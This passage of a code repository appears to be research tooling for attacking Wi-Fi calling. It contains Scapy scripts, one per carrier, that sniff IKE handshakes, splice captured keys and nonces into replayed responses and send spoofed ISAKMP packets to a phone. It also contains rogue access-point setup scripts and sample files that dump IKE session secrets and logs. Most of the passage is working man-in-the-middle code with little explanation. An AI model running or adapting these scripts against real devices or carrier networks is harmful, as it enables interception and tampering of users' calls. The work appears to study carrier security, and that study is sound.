2 | from scapy.all import *
3 | ipsec_server = "192.168.84.128"
4 | ue_addr = "10.0.0.109"
5 |
6 | ##### Phase 2 #####
7 |
8 | # capturing response pk from swan server to UE
9 | #packet2=sniff(iface="vmnet8", filter="udp and port 500", count=2, prn=lambda x: x.summary)
10 | packet2=sniff(iface="vmnet8", filter="udp and port 500", count=2)
11 |
12 | # storing 2nd response pk from swan ipsec server
13 | data3 = ""
14 | tlayer3 =packet2[1].getlayer(UDP)
15 | if packet2[1].getlayer(ISAKMP):
16 | #if packet2[1].getlayer(Raw):
17 | data3 += str(tlayer3.payload) #assemble the packet
18 |
19 | wrpcap("data3.pcap", packet2[1]) # overall packet
20 |
21 | f = open("raw_data3.dat", 'w')
22 | f.write(data3)
23 | f.close()
24 |
25 |
26 | #Packetizing data3 + data2
27 | #extracting key and nonce from data3
28 |
29 | new_key=""
30 | new_nonce=""
31 | pk = rdpcap("data3.pcap")
32 | new_key=pk[0][ISAKMP].payload.payload.load
33 | new_nonce=pk[0][ISAKMP].payload.payload.payload.load
34 |
35 |
36 | #replace privious response with extracted key and nonce.
37 | pkts = rdpcap("data2.pcap")
38 |
39 | pp = ISAKMP(data3) #payload only
40 | #pp = ISAKMP(pkts[0]) #payload only
41 |
42 | pp[0].payload.payload.load = new_key
43 | pp[0].payload.payload.payload.load = new_nonce
44 |
45 | #pp[0].length = '\x00\x00\x01\x7b'
46 | #pp[0].length = 0x149
47 | #pp[0].payload.payload.payload.payload.payload.next_payload = 0x26
48 | #pp[0].payload.payload.payload.payload.payload.payload.length = 0x19
49 | #pp[0].payload.payload.payload.payload.payload.payload.load = '\x04\x0a\x5e\x09\x6a\x86\x66\x05\xc7\xc4\x83\x3d\xa4\xd6\x1b\xb1\x12\x23\x2a\x77\x38'
50 |
51 | #print "pp"
52 | #hexdump(pp[0].payload.payload.load)
53 |
54 |
55 | #packetizing: original 1st response pkts + new key and nonce
56 |
57 | data4 = ""
58 | tlayer =pkts[0].getlayer(UDP)
59 | if pkts[0].getlayer(ISAKMP):
60 | data4 += str(pp[0])
61 |
62 | #send(IP(dst="10.0.0.30")/UDP()/ISAKMP(data3))
63 | send(IP(dst=ue_addr, src=pkts[0][IP].src)/UDP(dport=pkts[0].dport)/ISAKMP(data4))
64 | #send(IP(dst=ue_addr, src=pkts[0][IP].src)/UDP(dport=pkts[0].dport)/ISAKMP(data4))
65 |
66 |
67 |
68 |
69 |
--------------------------------------------------------------------------------
/et2_sprinter.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python
2 | from scapy.all import *
3 | ipsec_server = "192.168.84.128"
4 | ue_addr = "10.0.0.168"
5 | #ue_addr = "10.0.0.30"
6 |
7 | ##### Phase 2 #####
8 |
9 | # capturing response pk from swan server to UE
10 | #packet2=sniff(iface="vmnet8", filter="udp and port 500", count=2, prn=lambda x: x.summary)
11 | packet2=sniff(iface="vmnet8", filter="udp and port 500", count=2)
12 |
13 | # storing 2nd response pk from swan ipsec server
14 | data3 = ""
15 | tlayer3 =packet2[1].getlayer(UDP)
16 | if packet2[1].getlayer(ISAKMP):
17 | data3 += str(tlayer3.payload) #assemble the packet
18 |
19 | wrpcap("data3.pcap", packet2[1]) # overall packet
20 |
21 | f = open("raw_data3.dat", 'w')
22 | f.write(data3)
23 | f.close()
24 |
25 |
26 | #Packetizing data3 + data2
27 | #extracting key and nonce from data3
28 | new_key=""
29 | new_nonce=""
30 | pk = rdpcap("data3.pcap")
31 | new_key=pk[0][ISAKMP].payload.payload.load # attribute error
32 | new_nonce=pk[0][ISAKMP].payload.payload.payload.load
33 |
34 | #print "new key"
35 | #hexdump(new_key)
36 | #print "new nonce"
37 | #hexdump(new_nonce)
38 |
39 | #replace privious response with extracted key and nonce.
40 | pkts = rdpcap("data2.pcap")
41 | pp = ISAKMP(data3) #payload only
42 | #pp = ISAKMP(pkts[0]) #payload only
43 | pp[0].payload.payload.load = new_key
44 | pp[0].payload.payload.payload.load = new_nonce
45 |
46 | #print "pp"
47 | #hexdump(pp[0].payload.payload.load)
48 |
49 |
50 | #packetizing: original 1st response pkts + new key and nonce
51 |
52 | data4 = ""
53 | tlayer =pkts[0].getlayer(UDP)
54 | if pkts[0].getlayer(ISAKMP):
55 | data4 += str(pp[0])
56 |
57 | #data2 = ""
58 | #tlayer =pp[0].getlayer("UDP")
59 | #if pp[0].getlayer(ISAKMP):
60 | # data2 += str(tlayer.payload)
61 |
62 |
63 | #f=open("raw_data2.dat",'r')
64 | #while True:
65 | # data2 = f.readline()
66 | # if len(data2)==0:
67 | # break
68 | # print data2
69 |
70 | #f.close()
71 |
72 |
73 | #wireshark(pkts)
74 | #pkts.key = new_key
75 | #pkts.nonce = new_nonce
76 | #send(IP(dst=10.0.0.30")/UDP()/ISAKMP(pkts))
77 |
78 | #send(IP(dst="10.0.0.30")/UDP()/ISAKMP(data3))
79 | send(IP(dst=ue_addr, src=pkts[0][IP].src)/UDP(dport=pkts[0].dport)/ISAKMP(data4))
80 |
81 | """
82 |
83 | ##### Phase 3 #####
84 |
85 |
86 | #########################################################
87 | # 3rd message capture,
88 | packet3=sniff(iface="eth0", filter="udp and port 500", count=2)
89 |
90 |
91 | # forwarding 3rd request pk from ue to swan server
92 | data4 = ""
93 | tlayer =packet3[1].getlayer("UDP")
94 | if packet3[1].getlayer("Raw"):
95 | data4 += str(tlayer.payload)
96 | f = open("raw_data3.dat", 'w')
97 | f.write(data4)
98 | f.close()
99 |
100 | #send(IP(dst=ipsec_server)/UDP()/ISAKMP(data4))
101 | send(IP(dst=ipsec_server, src=packet3[1][IP].src)/UDP(dport=packet3[1].dport)/ISAKMP(data4))
102 |
103 | #"""
104 |
105 |
--------------------------------------------------------------------------------
/et2_tmobile.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python
2 | from scapy.all import *
3 | ipsec_server = "192.168.56.102"
4 | #ipsec_server = "192.168.84.128"
5 | ue_addr = "10.0.0.190"
6 |
7 | ##### Phase 2 #####
8 |
9 | # capturing response pk from swan server to UE
10 | #packet2=sniff(iface="vmnet8", filter="udp and port 500", count=2, prn=lambda x: x.summary)
11 | packet2=sniff(iface="vboxnet0", filter="udp and port 500", count=2)
12 |
13 | # storing 2nd response pk from swan ipsec server
14 | data3 = ""
15 | tlayer3 =packet2[1].getlayer(UDP)
16 | if packet2[1].getlayer(ISAKMP):
17 | #if packet2[1].getlayer(Raw):
18 | data3 += str(tlayer3.payload) #assemble the packet
19 |
20 | wrpcap("data3.pcap", packet2[1]) # overall packet
21 |
22 | """
23 | f = open("raw_data3.dat", 'w')
24 | f.write(data3)
25 | f.close()
26 | """
27 |
28 | #Packetizing data3 + data2
29 | #extracting key and nonce from data3
30 |
31 | new_key=""
32 | new_nonce=""
33 | pk = rdpcap("data3.pcap")
34 | new_key=pk[0][ISAKMP].payload.payload.load
35 | new_nonce=pk[0][ISAKMP].payload.payload.payload.load
36 |
37 |
38 | #replace privious response with extracted key and nonce.
39 | pkts = rdpcap("data2.pcap")
40 |
41 | pp = ISAKMP(data3) #payload only
42 | #pp = ISAKMP(pkts[0]) #payload only
43 |
44 | pp[0].payload.payload.load = new_key
45 | pp[0].payload.payload.payload.load = new_nonce
46 |
47 | # cert req payload
48 | """
49 | pp[0].length = '\x00\x00\x01\x7b'
50 | pp[0].length = 0x149
51 | pp[0].payload.payload.payload.payload.payload.next_payload = 0x26
52 | pp[0].payload.payload.payload.payload.payload.payload.length = 0x19
53 | pp[0].payload.payload.payload.payload.payload.payload.load = '\x04\x0a\x5e\x09\x6a\x86\x66\x05\xc7\xc4\x83\x3d\xa4\xd6\x1b\xb1\x12\x23\x2a\x77\x38'
54 | """
55 |
56 | #print "pp"
57 | #hexdump(pp[0].payload.payload.load)
58 |
59 |
60 | #packetizing: original 1st response pkts + new key and nonce
61 |
62 | data4 = ""
63 | tlayer =pkts[0].getlayer(UDP)
64 | if pkts[0].getlayer(Raw):
65 | data4 += str(pp[0])
66 |
67 | #send(IP(dst="10.0.0.30")/UDP()/ISAKMP(data3))
68 | send(IP(dst=ue_addr, src=pkts[0][IP].src)/UDP(dport=pkts[0].dport)/ISAKMP(data4))
69 | #send(IP(dst=ue_addr, src=pkts[0][IP].src)/UDP(dport=pkts[0].dport)/ISAKMP(data4))
70 |
71 |
72 |
--------------------------------------------------------------------------------
/et2_verizon.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python
2 | from scapy.all import *
3 | ipsec_server = "192.168.56.102"
4 | ue_addr = "10.0.0.36"
5 |
6 | ##### Phase 2 #####
7 |
8 | # capturing response pk from swan server to UE
9 | #packet2=sniff(iface="vmnet8", filter="udp and port 500", count=2, prn=lambda x: x.summary)
10 | packet2=sniff(iface="vboxnet0", filter="udp and port 500", count=2)
11 |
12 | # storing 2nd response pk from swan ipsec server
13 | data3 = ""
14 | tlayer3 =packet2[1].getlayer(UDP)
15 | #if packet2[1].getlayer(ISAKMP):
16 | if packet2[1].getlayer(ISAKMP):
17 | data3 += str(tlayer3.payload) #assemble the packet
18 |
19 | wrpcap("data3.pcap", packet2[1]) # overall packet
20 |
21 | f = open("raw_data3.dat", 'w')
22 | f.write(data3)
23 | f.close()
24 |
25 |
26 | #Packetizing data3 + data2
27 | #extracting key and nonce from data3
28 | new_key=""
29 | new_nonce=""
30 | pk = rdpcap("data3.pcap")
31 | new_key=pk[0][ISAKMP].payload.payload.load
32 | new_nonce=pk[0][ISAKMP].payload.payload.payload.load
33 |
34 | #print "new key"
35 | #hexdump(new_key)
36 | #print "new nonce"
37 | #hexdump(new_nonce)
38 |
39 | #replace privious response with extracted key and nonce.
40 | pkts = rdpcap("data2.pcap")
41 | pp = ISAKMP(data3) #payload only
42 | #pp = ISAKMP(pkts[0]) #payload only
43 | pp[0].payload.payload.load = new_key
44 | pp[0].payload.payload.payload.load = new_nonce
45 |
46 | #print "pp"
47 | #hexdump(pp[0].payload.payload.load)
48 |
49 |
50 | #packetizing: original 1st response pkts + new key and nonce
51 |
52 | data4 = ""
53 | tlayer =pkts[0].getlayer(UDP)
54 | if pkts[0].getlayer(ISAKMP):
55 | data4 += str(pp[0])
56 |
57 | #data2 = ""
58 | #tlayer =pp[0].getlayer("UDP")
59 | #if pp[0].getlayer(ISAKMP):
60 | # data2 += str(tlayer.payload)
61 |
62 |
63 | #f=open("raw_data2.dat",'r')
64 | #while True:
65 | # data2 = f.readline()
66 | # if len(data2)==0:
67 | # break
68 | # print data2
69 |
70 | #f.close()
71 |
72 |
73 | #wireshark(pkts)
74 | #pkts.key = new_key
75 | #pkts.nonce = new_nonce
76 | #send(IP(dst=10.0.0.30")/UDP()/ISAKMP(pkts))
77 |
78 | #send(IP(dst="10.0.0.30")/UDP()/ISAKMP(data3))
79 | send(IP(dst=ue_addr, src=pkts[0][IP].src)/UDP(dport=pkts[0].dport)/ISAKMP(data4))
80 |
81 | """
82 |
83 | ##### Phase 3 #####
84 |
85 |
86 | #########################################################
87 | # 3rd message capture,
88 | packet3=sniff(iface="eth0", filter="udp and port 500", count=2)
89 |
90 |
91 | # forwarding 3rd request pk from ue to swan server
92 | data4 = ""
93 | tlayer =packet3[1].getlayer("UDP")
94 | if packet3[1].getlayer("Raw"):
95 | data4 += str(tlayer.payload)
96 | f = open("raw_data3.dat", 'w')
97 | f.write(data4)
98 | f.close()
99 |
100 | #send(IP(dst=ipsec_server)/UDP()/ISAKMP(data4))
101 | send(IP(dst=ipsec_server, src=packet3[1][IP].src)/UDP(dport=packet3[1].dport)/ISAKMP(data4))
102 |
103 | #"""
104 |
105 |
--------------------------------------------------------------------------------
/install/SoftAP.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/install/SoftAP.pdf
--------------------------------------------------------------------------------
/install/softAP_bolck:
--------------------------------------------------------------------------------
1 | airmon-ng start wlan0
2 | ifconfig wlan0mon 10.0.0.1/24
3 | iptables -t nat -F
4 | iptables -L
5 | iptables -F
6 | iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
7 | iptables -A FORWARD -i wlan0mon -o eth0 -j ACCEPT
8 | iptables -A FORWARD -i eth0 -s 208.54.0.0/16 -j DROP
9 | iptables -A FORWARD -i eth0 -s 68.31.0.0/16 -j DROP
10 | iptables -A FORWARD -i eth0 -s 141.207.0.0/16 -j DROP
11 | iptables -A FORWARD -i eth0 -s 129.192.0.0/16 -j DROP
12 | echo '1'>/proc/sys/net/ipv4/ip_forward
13 | /etc/init.d/dnsmasq stop
14 | /etc/init.d/dnsmasq start
15 | cd /etc/hostapd/
16 | hostapd hostapd.conf
17 |
--------------------------------------------------------------------------------
/install/softAP_script:
--------------------------------------------------------------------------------
1 | airmon-ng start wlan0
2 | ifconfig wlan0mon 10.0.0.1/24
3 | iptables -t nat -F
4 | iptables -L
5 | iptables -F
6 | iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
7 | iptables -A FORWARD -i wlan0mon -o eth0 -j ACCEPT
8 | iptables -A FORWARD -i eth0 -s 208.54.0.0/16 -j DROP
9 | iptables -A FORWARD -i eth0 -s 68.31.0.0/16 -j DROP
10 | iptables -A FORWARD -i eth0 -s 141.207.0.0/16 -j DROP
11 | iptables -A FORWARD -i eth0 -s 129.192.0.0/16 -j DROP
12 | echo '1'>/proc/sys/net/ipv4/ip_forward
13 | /etc/init.d/dnsmasq stop
14 | /etc/init.d/dnsmasq start
15 | cd /etc/hostapd/
16 | hostapd hostapd.conf
17 |
--------------------------------------------------------------------------------
/install/strong_swan_install.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/install/strong_swan_install.pdf
--------------------------------------------------------------------------------
/install/vmare.txt:
--------------------------------------------------------------------------------
1 | https://noajoa.blogspot.kr/2015/12/kali-linux-vmware_15.html
--------------------------------------------------------------------------------
/sample/AT&T/180201AT&T_SUCCESS.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/sample/AT&T/180201AT&T_SUCCESS.pcapng
--------------------------------------------------------------------------------
/sample/AT&T/180201AT_KEY.txt:
--------------------------------------------------------------------------------
1 | SKEYSEED => 32 bytes @ 0x7efddc003da0
2 | 61DAEBC94110CDBBC95EC995033D55D17E7536D3508CEAE9FFD0010F27A7D163
3 |
4 | Sk_d secret => 32 bytes @ 0x7efddc003da0
5 | 24E045F28065DF5CEAAFA1AE64E102AF55A5A193BE8FE0C20D1C3E803CACF2E6
6 |
7 | Sk_ai secret => 32 bytes @ 0x7efddc003560
8 | F29C50FEE3274309E97F8A2C0F61B27C7560EDF83618267D9E062CAACDBCF658
9 |
10 | Sk_ar secret => 32 bytes @ 0x7efddc003560
11 | F8D132F100A209ACEC03040F8FA44CB48477A5418F5883BC16A937CB81C87E17
12 |
13 | Sk_ei secret => 16 bytes @ 0x7efddc003590
14 | 752D670B78C454CD065CA695789C7CD2
15 |
16 | Sk_er secret => 16 bytes @ 0x7efddc003590
17 | 638DC50C8966F7374CE35C2201A6F03B
18 |
19 | ISPI ee74000fdadc110a
20 |
21 | RSPI 835929e373516ccf
22 |
23 |
24 |
25 | aes-128-cbc
26 | hmac_sha2_256_128
27 |
--------------------------------------------------------------------------------
/sample/sprinter/1891181350_sprinter.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/sample/sprinter/1891181350_sprinter.pcapng
--------------------------------------------------------------------------------
/sample/sprinter/sprinter_keys.txt:
--------------------------------------------------------------------------------
1 | SKEYSEED => 20 bytes @ 0x7f58e8004540
2 |
3 | 39 15 CE 06 67 E5 D4 44 EC 38 F7 39 09 6A 8A C5
4 | 74 FA DD 66
5 |
6 | Sk_d secret => 20 bytes
7 | CD 66 6D 04 C2 38 E4 64 AE E6 FD 63 00 00 FD 29
8 | 9A 5B 5C D1
9 |
10 | Sk_ai secret => 20 bytes @ 0x7f58e8003dd0
11 | DB1E91454A8DFDD8E789789FECFB9A65C51B0763 ...c
12 |
13 | Sk_ar secret => 20 bytes @ 0x7f58e8003dd0
14 | A93D33ADF3160335970220DEC52CE8710712CC7E ...~
15 |
16 | Sk_ei secret => 16 bytes @ 0x7f58e8003dd0
17 | BF23AE7846AB2159F4481098A98AEF73
18 |
19 | Sk_er secret => 16 bytes @ 0x7f58e8003dd0
20 | 644AFD78FE3BB9B6FF2706BBA9570FA3
21 |
22 |
23 | ISPI 8f774f7810af09e4
24 | RSPI caeb4e55a0985ab0
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/sample/t-mobile/180206-4th-keys.txt:
--------------------------------------------------------------------------------
1 | Sk_ai secret => 20 bytes @ 0x7f34fc001c70
2 | 8717C3D32FDEDA7714B17A0FA24BB946BE04ADBF
3 |
4 | Sk_ar secret => 20 bytes @ 0x7f34fc001c70
5 | B7D7B900ABB702CD9B38AC1F21A39ECD2E436C09
6 |
7 | Sk_ei secret => 32 bytes @ 0x7f34fc001ab0
8 | B409E125728ADA01BFD66C7269B31ECB4D83A464226F1F7CBD05DD2A6A990BAE
9 |
10 | Sk_er secret => 32 bytes @ 0x7f34fc001ab0
11 | ACB27061AC97B81B1A14D4C3DF9796056F8F990CEC589FAC339612F756D5A439
12 |
13 | Sk_pi secret => 20 bytes @ 0x7f34fc001440
14 | 4700820AA1C62976F9CC130594A2B72EBD87E36C
15 |
16 | Sk_pr secret => 20 bytes @ 0x7f34fc001ab0
17 | 33DA29BB66E418767689AC635F3DA8B45D5A3BEE
18 |
19 | ispi f831ea836356a837
20 | rspi 146ca01187203522
--------------------------------------------------------------------------------
/sample/t-mobile/180206_4thmessage-success_w_keys.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/sample/t-mobile/180206_4thmessage-success_w_keys.pcapng
--------------------------------------------------------------------------------
/sample/t-mobile/log_sample.txt:
--------------------------------------------------------------------------------
1 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] SKEYSEED => 20 bytes @ 0x7f34fc001540
2 |
3 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 0: B8 12 F1 2E FD 03 A6 96 B0 F6 C7 92 61 97 97 CB ............a...
4 |
5 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 16: 37 BF 83 E8 7...
6 |
7 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] Sk_d secret => 20 bytes @ 0x7f34fc001540
8 |
9 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 0: CA F6 D6 CC 3F 65 08 F7 56 21 A9 5A BD 24 72 AB ....?e..V!.Z.$r.
10 |
11 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 16: A2 58 63 02 .Xc.
12 |
13 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] Sk_ai secret => 20 bytes @ 0x7f34fc001c70
14 |
15 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 0: 87 17 C3 D3 2F DE DA 77 14 B1 7A 0F A2 4B B9 46 ..../..w..z..K.F
16 |
17 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 16: BE 04 AD BF ....
18 |
19 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] Sk_ar secret => 20 bytes @ 0x7f34fc001c70
20 |
21 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 0: B7 D7 B9 00 AB B7 02 CD 9B 38 AC 1F 21 A3 9E CD .........8..!...
22 |
23 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 16: 2E 43 6C 09 .Cl.
24 |
25 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] Sk_ei secret => 32 bytes @ 0x7f34fc001ab0
26 |
27 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 0: B4 09 E1 25 72 8A DA 01 BF D6 6C 72 69 B3 1E CB ...%r.....lri...
28 |
29 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 16: 4D 83 A4 64 22 6F 1F 7C BD 05 DD 2A 6A 99 0B AE M..d"o.|...*j...
30 |
31 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] Sk_er secret => 32 bytes @ 0x7f34fc001ab0
32 |
33 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 0: AC B2 70 61 AC 97 B8 1B 1A 14 D4 C3 DF 97 96 05 ..pa............
34 |
35 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 16: 6F 8F 99 0C EC 58 9F AC 33 96 12 F7 56 D5 A4 39 o....X..3...V..9
36 |
37 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] Sk_pi secret => 20 bytes @ 0x7f34fc001440
38 |
39 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 0: 47 00 82 0A A1 C6 29 76 F9 CC 13 05 94 A2 B7 2E G.....)v........
40 |
41 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 16: BD 87 E3 6C ...l
42 |
43 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] Sk_pr secret => 20 bytes @ 0x7f34fc001ab0
44 |
45 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 0: 33 DA 29 BB 66 E4 18 76 76 89 AC 63 5F 3D A8 B4 3.).f..vv..c_=..
46 |
47 | Feb 6 18:13:36 ubuntu charon-custom: 03[IKE] 16: 5D 5A 3B EE
--------------------------------------------------------------------------------
/sample/verizon/0124Verizon_fail.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/sample/verizon/0124Verizon_fail.pcapng
--------------------------------------------------------------------------------
/sample/verizon/052518_verizon_success.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/sample/verizon/052518_verizon_success.pcap
--------------------------------------------------------------------------------
/sample/verizon/052518_verizon_success.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/sample/verizon/052518_verizon_success.pcapng
--------------------------------------------------------------------------------
/sample/verizon/data1.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/sample/verizon/data1.pcap
--------------------------------------------------------------------------------
/sample/verizon/data2.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/sample/verizon/data2.pcap
--------------------------------------------------------------------------------
/sample/verizon/data3.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sefcom/Wi-Fi-Calling-source-code/06c32c6b9082efcfc48c8a0d3131f4174020b1af/sample/verizon/data3.pcap
--------------------------------------------------------------------------------